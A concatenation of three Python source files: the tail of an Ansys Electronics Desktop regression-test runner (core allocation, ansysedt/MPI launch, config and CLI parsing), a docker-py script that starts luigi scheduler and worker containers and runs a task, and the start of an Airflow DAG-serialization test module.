                    # take always integer since ticks are integers, and +1 to allow to slide
                    project_report["slider_limit"] = max(project_report["slider_limit"], int(max_delta_perc) + 1)
                    plot_data.update(
                        {
                            "version_ref": self.reference_data[project_name]["aedt_version"],
                            "y_axis_ref": y_ref_data,
                            "diff": difference,
                            "delta": max_delta_perc,
                        }
                    )
                project_report["plots"].append(plot_data)
def extract_mesh_or_time_data(
    self,
    key_name: str,
    design_data: Dict[str, Any],
    design_name: str,
    project_name: str,
    project_report: Dict[str, Union[List[Any], Any]],
) -> None:
    """Extract mesh or simulation-time statistics for one design.

    Mutates ``project_report[key_name]`` with one entry per (variation, setup)
    pair; when a reference run is available the matching reference value is
    attached under "ref", and missing variations are reported as errors.

    Parameters
    ----------
    key_name : str
        Either "mesh" or "simulation_time" — which statistic to extract.
    design_data : dict
        All the data related to a single design in ``project_name``.
    design_name : str
        Name of the design.
    project_name : str
        Name of the project.
    project_report : dict
        Project report dictionary that is required by ``render_project_html()``.
    """
    for variation_name, variation_data in design_data[key_name].items():
        for setup_name, current_stat in variation_data.items():
            entry = {
                "name": f"{design_name}:{setup_name}:{variation_name}",
                "current": current_stat,
            }
            if not self.only_reference:
                reference = self.reference_data[project_name]["designs"][design_name][key_name]
                if variation_name not in reference:
                    project_report["error_exception"].append(
                        f"Variation ({variation_name}) wasn't found in reference results for design: {design_name}"
                    )
                    continue
                entry["ref"] = reference[variation_name][setup_name]
            project_report[key_name].append(entry)
def allocator(self) -> Iterable[Tuple[str, Dict[str, Dict[str, int]]]]:
    """Generator that yields resources.

    Waits (polling with sleeps) until cores are free, preferring to place a
    whole project on a single node before splitting it across machines.
    Projects are handed out largest-first to maximize pool utilization.

    Yields
    ------
    proj_name : str
        Name of the project.
    allocated_machines : Dict
        Allocated machines.
    """
    sorted_by_cores_desc = sorted(
        self.project_tests_config.keys(),
        key=lambda x: self.project_tests_config[x]["distribution"]["cores"],
        reverse=True,
    )
    proj_name = ""
    while sorted_by_cores_desc:
        if self.active_tasks >= self.max_parallel_projects:
            logger.debug("Number of maximum tasks limit is reached. Wait for job to finish")
            sleep(4)
            continue
        allocated_machines = None
        for proj_name in sorted_by_cores_desc:
            # first try to fit all jobs within a single node for stability, since projects are sorted
            # by cores, this ensures that we have optimized resource utilization
            allocated_machines = allocate_task_within_node(
                self.project_tests_config[proj_name]["distribution"], self.machines_dict
            )
            if allocated_machines:
                break
        else:
            for proj_name in sorted_by_cores_desc:
                # since no more machines to fit the whole project, let's split it across machines
                allocated_machines = allocate_task(
                    self.project_tests_config[proj_name]["distribution"], self.machines_dict
                )
                if allocated_machines:
                    break
            else:
                # Nothing fits right now: report free cores and poll again.
                msg = "Waiting for resources. Cores left per machine:\n"
                for machine, cores in self.machines_dict.items():
                    msg += f"{machine} has {cores} core(s) free\n"
                logger.debug(msg)
                sleep(5)
        if allocated_machines:
            # Reserve the granted cores before handing the project out.
            for machine in allocated_machines:
                self.machines_dict[machine] -= allocated_machines[machine]["cores"]
            sorted_by_cores_desc.remove(proj_name)
            self.active_tasks += 1
            yield proj_name, allocated_machines
def allocate_task(
    distribution_config: Dict[str, int], machines_dict: Dict[str, int]
) -> Optional[Dict[str, Dict[str, int]]]:
    """Allocate a job across one or more nodes (MPI split).

    Parametric tasks, when defined, are distributed in whole multiples of
    ``cores / parametric_tasks`` per machine; single-task jobs greedily take
    whatever cores each machine has free.

    Parameters
    ----------
    distribution_config : dict
        Data about required distribution for the project.
    machines_dict : dict
        All available machines in pool.

    Returns
    -------
    dict
        Allocated machines for the project or ``None`` if not allocated.
    """
    if distribution_config["single_node"]:
        # Single-node jobs are handled exclusively by allocate_task_within_node().
        return None
    remaining_tasks = distribution_config["parametric_tasks"]
    cores_per_task = int(distribution_config["cores"] / remaining_tasks)
    remaining_cores = distribution_config["cores"]
    allocation = {}
    for machine, free_cores in machines_dict.items():
        if free_cores < 1:
            # skip machine if no cores available
            continue
        if remaining_tasks == 1:
            take_tasks = 1
            take_cores = free_cores if remaining_cores - free_cores > 0 else remaining_cores
        else:
            # with multiple tasks we can only take whole cores_per_task chunks
            if free_cores < cores_per_task:
                continue
            take_tasks = min((free_cores // cores_per_task, remaining_tasks))
            remaining_tasks -= take_tasks
            take_cores = cores_per_task * take_tasks
        allocation[machine] = {
            "cores": take_cores,
            "tasks": take_tasks,
        }
        remaining_cores -= take_cores
        if remaining_cores <= 0:
            break
    if remaining_cores > 0:
        # not enough resources
        logger.debug("Not enough resources to split job")
        return None
    return allocation
def allocate_task_within_node(
    distribution_config: Dict[str, int], machines_dict: Dict[str, int]
) -> Dict[str, Dict[str, int]]:
    """Try to fit a task in a single node without splitting.

    Parameters
    ----------
    distribution_config : dict
        Data about required distribution for the project.
    machines_dict : dict
        All available machines in pool.

    Returns
    -------
    machines : dict
        Allocated machines for the project, or an empty dict when no single
        machine has enough free cores.
    """
    required_cores = distribution_config["cores"]
    for machine, free_cores in machines_dict.items():
        if free_cores >= required_cores:
            return {
                machine: {
                    "cores": required_cores,
                    "tasks": distribution_config["parametric_tasks"],
                }
            }
    return {}
def copy_proj(project_config: Dict[str, Any], dst: str) -> Union[str, List[str]]:
    """Copy the project file/folder into the run location (temp by default).

    Parameters
    ----------
    project_config : dict
        Configuration of project, distribution, etc.
    dst : str
        Path where to copy.

    Returns
    -------
    path : str
        Location where it was copied.
    """
    return copy_path_to(project_config["path"], dst)
def copy_dependencies(project_config: Dict[str, Any], dst: str) -> None:
    """Copy the project's dependency files/folders into the run location.

    Accepts either a single path string or a list of paths under the
    "dependencies" key; any other type is silently ignored.

    Parameters
    ----------
    project_config : dict
        Configuration of project, distribution, etc.
    dst : str
        Path where to copy.
    """
    deps = project_config["dependencies"]
    if isinstance(deps, str):
        targets = [deps]
    elif isinstance(deps, list):
        targets = deps
    else:
        targets = []
    for dep in targets:
        copy_path_to(dep, dst)
def copy_path_to(src: str, dst: str) -> Union[str, List[str]]:
    """Copy path from src to dst.

    If ``src`` is a relative path with subfolders, the relative folder tree is
    preserved under ``dst``.

    Parameters
    ----------
    src : str
        Path with copy target, relative or absolute.
    dst : str
        Path where to copy.

    Returns
    -------
    path: str or list
        Path to copied file or list with paths if folder is copied.

    Raises
    ------
    FileNotFoundError
        If ``src`` does not exist.
    """
    src_path = Path(src.replace("\\", "/"))
    if not src_path.is_absolute() and len(src_path.parents) > 1:
        # Relative path with subfolders: mirror the relative tree under dst.
        unpack_dst = Path(dst) / src_path.parents[0]
        if not src_path.is_file():
            unpack_dst /= src_path.name
    elif not src_path.is_file():
        unpack_dst = Path(dst) / src_path.name
    else:
        unpack_dst = Path(dst)
    src_path = src_path.expanduser().resolve()
    if not src_path.exists():
        # BUG FIX: previously raised FileExistsError, which signals the opposite
        # condition. FileNotFoundError is still an OSError, so existing
        # `except OSError` handlers keep working.
        raise FileNotFoundError(f"File {src_path} doesn't exist")
    dst = str(unpack_dst)
    mkpath(dst)
    if src_path.is_file():
        file_path = copy_file(str(src_path), dst)
        return file_path[0]
    return copy_tree(str(src_path), dst)
def mkdtemp_persistent(*args: Any, persistent: bool = True, **kwargs: Any) -> Any:
    """Context manager for a temp directory that optionally outlives the block.

    Parameters
    ----------
    *args: Any
        TemporaryDirectory args
    persistent : bool, default=True
        If ``True``, the directory is NOT removed on context exit.
    **kwargs: Any
        TemporaryDirectory keyword arguments.

    Returns
    -------
    tempfile.TemporaryDirectory
        Context manager yielding the directory path.
    """
    if not persistent:
        # Non-persistent: the stdlib manager deletes the directory on exit.
        return tempfile.TemporaryDirectory(*args, **kwargs)

    @contextmanager
    def _persistent_dir() -> Iterator[str]:
        # Created on __enter__, intentionally never removed.
        yield tempfile.mkdtemp(*args, **kwargs)

    return _persistent_dir()
def generator_unique_id() -> Iterator[str]:
    """Infinite generator yielding "a1", "a2", "a3", ... in order."""
    counter = 0
    while True:
        counter += 1
        yield f"a{counter}"
# Shared module-level generator backing unique_id(); each call advances it.
id_generator = generator_unique_id()
def unique_id() -> str:
    """Advance the module-level generator and return the next unique ID.

    Returns
    -------
    id : str
        New ID (e.g. "a1", "a2", ...), used as an HTML element anchor.
    """
    return next(id_generator)
def execute_aedt(
    version: str,
    machines: Dict[str, Any],
    distribution_config: Dict[str, Any],
    script: Optional[str] = None,
    script_args: Optional[str] = None,
    project_path: Optional[str] = None,
) -> None:
    """Execute single instance of Electronics Desktop.

    Builds the full ansysedt command line (distribution flags, machine list,
    optional non-graphical script run and project/log paths) and blocks until
    the process exits.  On Linux the command is wrapped in Intel MPI.

    Parameters
    ----------
    version : str
        Version to run.
    machines : dict
        Machine specification for current job.
    distribution_config : dict
        Distribution configuration for the job.
    script : str, optional
        Path to the script.
    script_args : str, optional
        Arguments to the script.
    project_path : str, optional
        Path to the project.
    """
    aedt_path = get_aedt_executable_path(version)
    command = [aedt_path]
    if distribution_config["auto"]:
        # Auto mode: AEDT decides task placement; tasks field is -1.
        aedt_format_machines = ",".join([f"{name}:-1:{conf['cores']}:90%" for name, conf in machines.items()])
        command += ["-auto", f"NumDistributedVariations={distribution_config['parametric_tasks']}"]
    else:
        # Explicit distributed mode with per-machine task/core counts.
        aedt_format_machines = ",".join(
            [f"{name}:{conf['tasks']}:{conf['cores']}:90%" for name, conf in machines.items()]
        )
        command.append("-distributed")
        dist_type_str = ",".join([dist_type for dist_type in distribution_config["distribution_types"]])
        command.append(f"includetypes={dist_type_str}")
        tasks = int(distribution_config["multilevel_distribution_tasks"])
        if tasks > 0:
            command.append("maxlevels=2")
            command.append(f"numlevel1={tasks}")
    command += ["-machinelist", "list=" + aedt_format_machines]
    if script is not None:
        # Non-graphical script execution; AEDT exits when the script finishes.
        command += [
            "-ng",
            "-features=SF6694_NON_GRAPHICAL_COMMAND_EXECUTION",
            "-RunScriptAndExit",
            script,
        ]
        if script_args is not None:
            command += [
                "-ScriptArgs",
                f'"{script_args}"',
            ]
    if project_path is not None:
        log_path = f"{LOGFOLDER_PATH / Path(project_path).stem}.log"
        command += [
            "-LogFile",
            log_path,
            project_path,
        ]
    if platform.system() == "Linux":
        logger.debug("Execute via Intel MPI")
        # Launch through mpiexec on the first allocated host.
        mpi_path = get_intel_mpi_path(version)
        command = [mpi_path, "-envall", "-n", "1", "-hosts", list(machines.keys())[0]] + command
    logger.debug(f"Execute {subprocess.list2cmdline(command)}")
    # Blocks until AEDT exits; raises CalledProcessError on non-zero status.
    output = subprocess.check_output(command)
    logger.debug(output.decode())
def get_intel_mpi_path(version: str) -> str:
    """Get path to Intel MPI on Linux machines.

    Parameters
    ----------
    version : str
        Version of Electronics Desktop.

    Returns
    -------
    path : str
        Path to Electronics Desktop Intel MPI `mpiexec`.
    """
    install_root = get_aedt_install_path(version)
    mpi_path = install_root.joinpath(
        "common", "fluent_mpi", "multiport", "mpi", "lnamd64", "intel", "bin", "mpiexec"
    )
    if not mpi_path.exists():
        raise OSError(f"Intel MPI doesn't exist under {mpi_path}")
    return str(mpi_path)
def get_aedt_executable_path(version: str) -> str:
    """Get platform specific Electronics Desktop executable path.

    Parameters
    ----------
    version : str
        Version of Electronics Desktop.

    Returns
    -------
    path : str
        Path to Electronics Desktop executable.
    """
    install_root = get_aedt_install_path(version)
    system = platform.system()
    if system == "Windows":
        binary = "ansysedt.exe"
    elif system == "Linux":
        binary = "ansysedt"
    else:
        raise SystemError("Platform is neither Windows nor Linux")
    return str(install_root / binary)
def get_aedt_install_path(version: str) -> Path:
    """Extract installation path of AEDT from environment variable.

    Parameters
    ----------
    version : str
        Version of Electronics Desktop.

    Returns
    -------
    path : Path
        Path to Electronics Desktop root.
    """
    env_name = f"ANSYSEM_ROOT{version}"
    install_dir = os.environ.get(env_name, None)
    if not install_dir:
        raise ValueError(f"Environment variable {env_name} is not set.")
    return Path(install_dir)
def time_now(posix: bool = False) -> str:
    """Return current date and time as a formatted string.

    Parameters
    ----------
    posix : bool
        Set to True to get a filename-safe format (underscores only).

    Returns
    -------
    str
        Date and time now.
    """
    if posix:
        return datetime.datetime.now().strftime("%Y_%m_%d_%H_%M_%S")
    return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
def compare_keys(
    dict_1: Dict[Any, Any],
    dict_2: Dict[Any, Any],
    exceptions_list: List[str],
    *,
    dict_path: str = "",
    results_type: str = "reference",
) -> None:
    """Recursively verify that every key of ``dict_1`` exists in ``dict_2``.

    Mutates ``exceptions_list``: one message per missing key, with the full
    "->"-joined path to the key.  Nested dicts are compared recursively.
    """
    prefix = f"{dict_path}->" if dict_path else ""
    for key, val in dict_1.items():
        if key not in dict_2:
            exceptions_list.append(f"Key '{prefix}{key}' does not exist in {results_type} results")
        elif isinstance(val, dict):
            compare_keys(val, dict_2[key], exceptions_list, dict_path=f"{prefix}{key}", results_type=results_type)
def read_configs(config_folder: Path) -> Dict[str, Any]:
    """Reads configuration files.

    Reads all .toml files from config_folder and prefills them with default
    configuration settings.

    Parameters
    ----------
    config_folder : Path
        Path to configuration folder.

    Returns
    -------
    dict
        Merged dictionary with all projects, keyed by project name.

    Raises
    ------
    KeyError
        If a config file lacks the ``[project]`` table or its ``name``.
    ValueError
        If no .toml files were found at all.
    """
    projects: Dict[str, Any] = {}
    for toml_file in config_folder.rglob("*.toml"):
        logger.debug(f"Add config {toml_file}")
        with open(toml_file, "rb") as file_handle:
            raw_conf = tomli.load(file_handle)
        try:
            project_conf = raw_conf["project"]
            project_name = project_conf["name"]
        except KeyError as exc:
            raise KeyError("Configuration file misses project name or has incorrect format") from exc
        distribution_defaults = {
            "cores": 1,
            "distribution_types": ["default"],
            "parametric_tasks": 1,
            "multilevel_distribution_tasks": 0,
            "single_node": False,
            "auto": True,
        }
        merged: Dict[str, Any] = {
            "path": f"{project_name}.aedt",
            "dependencies": [],
            "distribution": distribution_defaults,
        }
        # User-provided settings win over defaults ...
        merged.update(project_conf)
        # ... but the nested "distribution" table is merged key-by-key,
        # so a partial override keeps the remaining defaults.
        merged["distribution"] = {**distribution_defaults, **project_conf.get("distribution", {})}
        projects[project_name] = merged
    if not projects:
        raise ValueError("Project configuration files (.toml) were not found.")
    return projects
def parse_arguments() -> argparse.Namespace:
    """Parse and validate CLI arguments.

    Returns
    -------
    args : argparse.Namespace
        Validated arguments.

    Raises
    ------
    ValueError
        If mutually exclusive flags are combined, a required path does not
        exist, or the AEDT version string is malformed.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--aedt-version", required=True, help="Electronics Desktop version to test, e.g. 221")
    parser.add_argument("--config-folder", required=True, help="Path to project configuration folder")
    parser.add_argument("--reference-folder", help="Reference results folder path")
    parser.add_argument("--only-reference", action="store_true", help="Only create reference results")
    parser.add_argument(
        "--only-validate", action="store_true", help="Only validate current --config-file [and --reference-file]"
    )
    parser.add_argument(
        "--suppress-validation",
        action="store_true",
        help="Suppress validation of config file and reference file (DANGEROUS)",
    )
    parser.add_argument(
        "--out-dir", "-o", help="Output directory for reports and project files (if --save-sim-data set)"
    )
    parser.add_argument(
        "--save-sim-data", "-s", action="store_true", help="Save simulation data under output dir (--out-dir flag)"
    )
    parser.add_argument("--max-cores", "-c", type=int, help="total number of cores limit", default=99999)
    parser.add_argument(
        "--max-projects", "-mp", type=int, help="total number of parallel projects limit", default=99999
    )
    parser.add_argument("--debug", action="store_true", help="Adds additional DEBUG logs")
    cli_args = parser.parse_args()
    # Configure logging first so validation failures below are captured.
    log_level = 10 if cli_args.debug else 20
    if not LOGFOLDER_PATH.exists():
        LOGFOLDER_PATH.mkdir()
    set_logger(logging_file=LOGFILE_PATH, level=log_level, pyaedt_module=None)
    if not cli_args.only_reference:
        # Comparing against references requires a folder with .json results.
        if not cli_args.reference_folder:
            raise ValueError("Either set --only-reference flag or provide path via --reference-folder")
        cli_args.reference_folder = Path(cli_args.reference_folder)
        if not cli_args.reference_folder.is_dir():
            raise ValueError(f"Reference folder does not exist: {cli_args.reference_folder}")
        if len(list(cli_args.reference_folder.rglob("*.json"))) < 1:
            raise ValueError(f"No reference .json file found in {cli_args.reference_folder}")
    if cli_args.suppress_validation and cli_args.only_validate:
        raise ValueError("--only-validate and --suppress-validation are mutually exclusive")
    # BUG FIX: the namespace has no 'max_tasks' attribute (the option is
    # --max-projects -> max_projects); referencing cli_args.max_tasks raised
    # AttributeError whenever this check ran.
    if not (cli_args.max_cores or cli_args.max_projects):
        logger.warning(
            "No limits are specified for current job. This may lead to failure if you lack of license or resources"
        )
    # AEDT versions are exactly three digits, e.g. "221".
    aedt_version_pattern = re.compile(r"\d\d\d$")
    if not aedt_version_pattern.match(cli_args.aedt_version):
        raise ValueError("Electronics Desktop version value is invalid. Valid format example: 221")
    cli_args.config_folder = Path(cli_args.config_folder)
    if not cli_args.config_folder.is_dir():
        raise ValueError(f"Configuration folder does not exist: {cli_args.config_folder}")
    if cli_args.save_sim_data and not cli_args.out_dir:
        raise ValueError("Saving of simulation data was requested but output directory is not provided")
    return cli_args
if __name__ == "__main__":
    # Script entry point: run the workflow only when executed directly,
    # not when imported as a module.
    main()
|
prep_luigi.py | # encoding='utf-8'
"""
prep_luigi.py
sets up a luigid scheduler container and luigi worker
sets up TLS support so they can talk to each other
lets the worker execute a task
see docker-py on github and docs.docker site
"""
import docker # to talk to docker
import pprint # for printing to the command line
import logging # log progress, or lack thereof
from threading import Thread # to run selenium on its own thread
from selenium import webdriver # launch a browser to watch luigid scheduler
import time # to control a loop and/or a browser
# TODO:
# bind logs directory with /var/log
# remove the worker container after the task is done
# let it tell you what it's doing on a slack channel
# make some more task classes
# set the luigi-worker working dir to scripts directory
# append a timestamp to task names so that tasks are unique
# move this to docker-compose yml file?
# minimal logging...
# Minimal file-based logging; filemode='w' truncates the log on every run,
# so each invocation starts from a clean file.
logging.basicConfig(
    filename="prep_luigi.log",
    level=logging.DEBUG,
    format='%(asctime)s %(message)s',
    datefmt='%m/%d/%Y %I:%M:%S %p',
    filemode='w'
)
logging.debug("Start - debug")
#logging.info("Start - info")
#logging.error("Start - error")
#client = docker.from_env(assert_hostname=False)
#print (client.version())
# set paths to certs for tls
# set base url
# NOTE(review): client cert/key/CA are absolute paths into one user's
# docker-machine profile, and the base_url targets the default
# docker-machine VM IP — this only works on the original author's machine.
tls_config = docker.tls.TLSConfig(
    client_cert=(
        'C:\\Users\\trota\\.docker\\machine\\certs\\cert.pem',
        'C:\\Users\\trota\\.docker\\machine\\certs\\key.pem'
    ),
    verify='C:\\Users\\trota\\.docker\\machine\\certs\\ca.pem'
)
# NOTE(review): docker.Client is the legacy low-level API (renamed APIClient
# in docker-py 2.x); presumably this script targets docker-py 1.x — verify.
client = docker.Client(base_url='https://192.168.99.100:2376', tls=tls_config)
# print some information about the environment
info = client.info()
pp = pprint.PrettyPrinter(indent=4)
print(" ")
print("****************Info********************")
print(" ")
pp.pprint(info)
print(" ")
#print(" ")
#print("*************Images****************")
#print(" ")
#pp.pprint(client.images())
#print(" ")
#print(" ")
#print("*************Volumes****************")
#print(" ")
#pp.pprint(client.volumes())
#print(" ")
#print(" ")
# create a luigid container
# bind a directory to the container for persistant task history
# The scheduler UI (port 8082) is published on the docker-machine IP;
# the host state directory is mounted read-write at /var/tmp so luigid's
# task history survives container restarts.
containerA = client.create_container(
    image='tedder42/docker-luigid:latest',
    hostname="luigi-monitor",
    name="luigi-monitor",
    ports=[8082, 2376],
    host_config=client.create_host_config(
        port_bindings={8082: ('192.168.99.100', 8082)},
        binds={'/c/Users/trota/Source/luigi/docker-luigi/luigid/state': {
            'bind': '/var/tmp',
            'mode': 'rw',
        }
        }
    )
)
# Only create the worker when the scheduler container was created.
if containerA is not None:
    # create a worker container
    # bind a scripts directory to the container
    containerB = client.create_container(
        #image='trota/docker-luigi-worker:latest', # py 2.7
        image='trota/luigi-worker3:python3', # py 3.5
        ports=[8082, 2376],
        #command='/usr/local/app1/scripts/run.sh',
        # keep stdin open + allocate a tty so the container stays alive
        # waiting for exec'd commands instead of exiting immediately
        stdin_open=True,
        tty=True,
        name='luigi-worker',
        host_config=client.create_host_config(binds={
            '/c/Users/trota/Source/luigi/docker-luigi/scripts': {
                'bind': '/usr/local/app1/scripts/test',
                'mode': 'rw',
            }
        })
    )
# NOTE(review): if containerA were None, containerB would be undefined and
# the statements below would raise NameError — presumably the original
# script indented everything under the guard; confirm against the repo.
print(" ")
print("************Containers****************")
print(" ")
print('containerA', containerA)
print(" ")
print('containerB', containerB)
print(" ")
print("")
print("0")
print("")
# start the containers
client.start(containerA)
client.start(containerB)
print("")
print("containerA")
pp.pprint(client.inspect_container(containerA))
print("")
print("")
print("1")
print("containerB")
pp.pprint(client.inspect_container(containerB))
print("")
# open a browser for luigid
def open_browser():
    """Open the luigid visualiser in Chrome and poll until no tasks remain.

    Reads the PENDING/RUNNING counters from the scheduler dashboard every
    5 seconds and quits the browser once both reach zero.
    """
    # TODO: make this a class with tasks pending and running as object properties
    browser = webdriver.Chrome()
    browser.get('http://192.168.99.100:8082/static/visualiser/index.html#')

    def _read_counts():
        """Return (pending, running) counter texts from the dashboard, stripped."""
        pending = browser.find_element_by_css_selector(
            "#PENDING_info span.info-box-number"
        )
        running = browser.find_element_by_css_selector(
            "#RUNNING_info span.info-box-number"
        )
        # BUG FIX: str.strip() returns a new string; the original called
        # .strip() and discarded the result, leaving the values unstripped.
        return pending.text.strip(), running.text.strip()

    num_tasks_pending, num_tasks_running = _read_counts()
    print("")
    print("pending: ", num_tasks_pending)
    print("")
    print("running: ", num_tasks_running)
    #time_end = time.time() + 60 * 5
    #while time.time() < time_end:
    while (int(num_tasks_pending) > 0) or (int(num_tasks_running) > 0):
        time.sleep(5)
        browser.refresh()
        num_tasks_pending, num_tasks_running = _read_counts()
    if (int(num_tasks_pending) == 0) and (int(num_tasks_running) == 0):
        time.sleep(5)  # give yourself 5 secs to see small tasks
        browser.quit()
# let the browser have its own thread
# browser_thread = Thread(target=open_browser)
# browser_thread.start()
# set up commands to execute
# TODO:
# let commands live in their own files
# to run a python script from a shell script
# (i.e. docker run -it -rm --name luigi_worker trota/docker-luigi-worker "/usr/local/app1/scripts/run.sh")
#cmd_dict = client.exec_create(
#    container=containerB.get('Id'),
#    cmd='/usr/local/app1/scripts/run.sh', stdout=True, stderr=True
#    )
# to run a python script somewhat more directly
# exec_create only registers the command; it runs later via exec_start.
cmd_dict = client.exec_create(
    container=containerB.get('Id'),
    #cmd="python -m luigi --module 'c:\\Users\\trota\\Source\\luigi\\docker-luigi\\scripts\\task_process_xml.py' ConvertFile --in_file fruits.xml",
    #cmd='python /usr/local/app1/scripts/test/task_process_xml.py',
    cmd='python /usr/local/app1/scripts/test/task_ftp.py',
    stdout=True, stderr=True
)
# to run a python script with arguments
# in a container with cmd of python, where you have a python prompt at entry
# exec(compile(open(filename, "rb").read(), filename, 'exec'), globals, locals)
# or
# exec(open("./filename").read())
#task_file="/usr/local/app1/scripts/test/task_process_xml.py"
#cmd_dict = client.exec_create(
#    container=containerB.get('Id'),
#    #cmd='exec(compile(open(task_file, "rb").read(), task_file, 'exec'))'
#    stdout=True, stderr=True, stdin=True
#    )
print("")
print("2")
print("")
print("")
pp.pprint(client.containers())
print("")
print("")
# loop through the command(s)
# exec_create returns a dict like {'Id': <exec id>}, so this loop sees a
# single pair where v is the exec id used by exec_inspect/exec_start below.
for k, v in cmd_dict.items():
    print(k, v)
    print(" ")
    pp.pprint(client.exec_inspect(v))
    logging.debug("Command: %s", client.exec_inspect(v))
    print(" ")
    # exec_start to run the command(s) we just set up
    # Just for containers which are running - you can set command in create_container.
    print("executing argument...")
    cmd_result = client.exec_start(v)
    print("")
    print("")
    # see what execution returned (raw bytes, then decoded text)
    pp.pprint(cmd_result)
    cmd_result = cmd_result.decode("utf-8")
    print(cmd_result)
    print("")
print("done")
# force removal of the worker container and any volumes
client.remove_container(
    container=containerB,
    v=True,
    force=True)
# feeble thread management - the selenium browsers thread
# browser_thread.join()
logging.debug("Done - debug")
#logging.info("Done - info") |
test_dag_serialization.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base_hook import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.operators.bash import BashOperator
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
# Pod used as the executor_config of the simple DAG's bash task; exercises
# serialization of k8s objects (pod_override) end to end.
executor_config_pod = k8s.V1Pod(
    metadata=k8s.V1ObjectMeta(name="my-name"),
    spec=k8s.V1PodSpec(containers=[
        k8s.V1Container(
            name="base",
            volume_mounts=[
                k8s.V1VolumeMount(
                    name="my-vol",
                    mount_path="/vol/"
                )
            ]
        )
    ]))
# Expected serialized form of the DAG built by make_simple_dag(); used as the
# ground truth in test_serialization. Keep in sync with make_simple_dag.
serialized_simple_dag_ground_truth = {
    "__version": 1,
    "dag": {
        "default_args": {
            "__type": "dict",
            "__var": {
                "depends_on_past": False,
                "retries": 1,
                "retry_delay": {
                    "__type": "timedelta",
                    "__var": 300.0
                }
            }
        },
        # 2019-08-01T00:00:00+00:00 as a POSIX timestamp.
        "start_date": 1564617600.0,
        '_task_group': {'_group_id': None,
                        'prefix_group_id': True,
                        'children': {'bash_task': ('operator', 'bash_task'),
                                     'custom_task': ('operator', 'custom_task')},
                        'tooltip': '',
                        'ui_color': 'CornflowerBlue',
                        'ui_fgcolor': '#000',
                        'upstream_group_ids': [],
                        'downstream_group_ids': [],
                        'upstream_task_ids': [],
                        'downstream_task_ids': []},
        "is_paused_upon_creation": False,
        "_dag_id": "simple_dag",
        # fileloc is nulled out by validate_serialized_dag before comparison.
        "fileloc": None,
        "tasks": [
            {
                "task_id": "bash_task",
                "owner": "airflow",
                "retries": 1,
                "retry_delay": 300.0,
                "_downstream_task_ids": [],
                "_inlets": [],
                "_outlets": [],
                "ui_color": "#f0ede4",
                "ui_fgcolor": "#000",
                "template_fields": ['bash_command', 'env'],
                "template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
                "bash_command": "echo {{ task.task_id }}",
                'label': 'bash_task',
                "_task_type": "BashOperator",
                "_task_module": "airflow.operators.bash",
                "pool": "default_pool",
                "executor_config": {'__type': 'dict',
                                    '__var': {"pod_override": {
                                        '__type': 'k8s.V1Pod',
                                        '__var': PodGenerator.serialize_pod(executor_config_pod)}
                                    }
                                    }
            },
            {
                "task_id": "custom_task",
                "retries": 1,
                "retry_delay": 300.0,
                "_downstream_task_ids": [],
                "_inlets": [],
                "_outlets": [],
                "_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
                "ui_color": "#fff",
                "ui_fgcolor": "#000",
                "template_fields": ['bash_command'],
                "template_fields_renderers": {},
                "_task_type": "CustomOperator",
                "_task_module": "tests.test_utils.mock_operators",
                "pool": "default_pool",
                'label': 'custom_task',
            },
        ],
        "timezone": "UTC",
        "_access_control": {
            "__type": "dict",
            "__var": {
                "test_role": {
                    "__type": "set",
                    "__var": [
                        "can_read",
                        "can_edit"
                    ]
                }
            }
        }
    },
}
# Repository root (two levels above this test file); used to glob example DAGs.
ROOT_FOLDER = os.path.realpath(
    os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
    """Loads DAGs from a module for test."""
    return DagBag(module_path).dags
def make_simple_dag():
    """Build the minimal two-task DAG whose serialized form is the ground truth."""
    simple_dag = DAG(
        dag_id='simple_dag',
        default_args={
            "retries": 1,
            "retry_delay": timedelta(minutes=5),
            "depends_on_past": False,
        },
        start_date=datetime(2019, 8, 1),
        is_paused_upon_creation=False,
        access_control={
            "test_role": {"can_read", "can_edit"}
        },
    )
    # Attach tasks explicitly via the dag kwarg instead of the context manager.
    CustomOperator(task_id='custom_task', dag=simple_dag)
    BashOperator(
        task_id='bash_task',
        bash_command='echo {{ task.task_id }}',
        owner='airflow',
        executor_config={"pod_override": executor_config_pod},
        dag=simple_dag,
    )
    return {'simple_dag': simple_dag}
def make_user_defined_macro_filter_dag():
    """Make DAGs with user defined macros and filters using locally defined methods.

    For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.

    The examples here test:
        (1) functions can be successfully displayed on UI;
        (2) templates with function macros have been rendered before serialization.
    """
    def compute_next_execution_date(dag, execution_date):
        return dag.following_schedule(execution_date)

    macro_dag = DAG(
        'user_defined_macro_filter_dag',
        default_args={'start_date': datetime(2019, 7, 10)},
        user_defined_macros={'next_execution_date': compute_next_execution_date},
        user_defined_filters={'hello': lambda name: 'Hello %s' % name},
        catchup=False,
    )
    BashOperator(
        task_id='echo',
        bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
        dag=macro_dag,
    )
    return {macro_dag.dag_id: macro_dag}
def collect_dags(dag_folder=None):
    """Collect the DAGs to test: the two local fixtures plus example DAG folders.

    ``dag_folder`` may be a single glob pattern or a list/tuple of patterns,
    relative to the repository root; default is all example_dags directories.
    """
    dags = {}
    dags.update(make_simple_dag())
